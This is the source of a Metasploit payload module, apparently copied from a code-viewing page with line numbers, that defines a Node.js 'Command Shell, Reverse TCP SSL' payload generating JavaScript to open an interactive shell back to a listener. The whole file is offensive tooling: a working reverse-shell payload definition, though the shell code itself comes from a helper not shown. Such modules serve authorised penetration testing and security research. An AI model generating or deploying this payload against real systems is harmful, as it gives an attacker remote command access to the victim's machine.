Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 831
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::NodeJS
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Command Shell, Reverse TCP SSL (via nodejs)',
18
      'Description'   => 'Creates an interactive shell via nodejs, uses SSL',
19
      'Author'        => ['RageLtMan', 'joev'],
20
      'License'       => BSD_LICENSE,
21
      'Platform'      => 'nodejs',
22
      'Arch'          => ARCH_NODEJS,
23
      'Handler'       => Msf::Handler::ReverseTcpSsl,
24
      'Session'       => Msf::Sessions::CommandShell,
25
      'PayloadType'   => 'nodejs',
26
      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
27
    ))
28
  end
29

30
  #
31
  # Constructs the payload
32
  #
33
  def generate(_opts = {})
34
    super + command_string
35
  end
36

37
  #
38
  # Returns the JS string to use for execution
39
  #
40
  def command_string
41
    nodejs_reverse_tcp(:use_ssl => true)
42
  end
43
end
44

45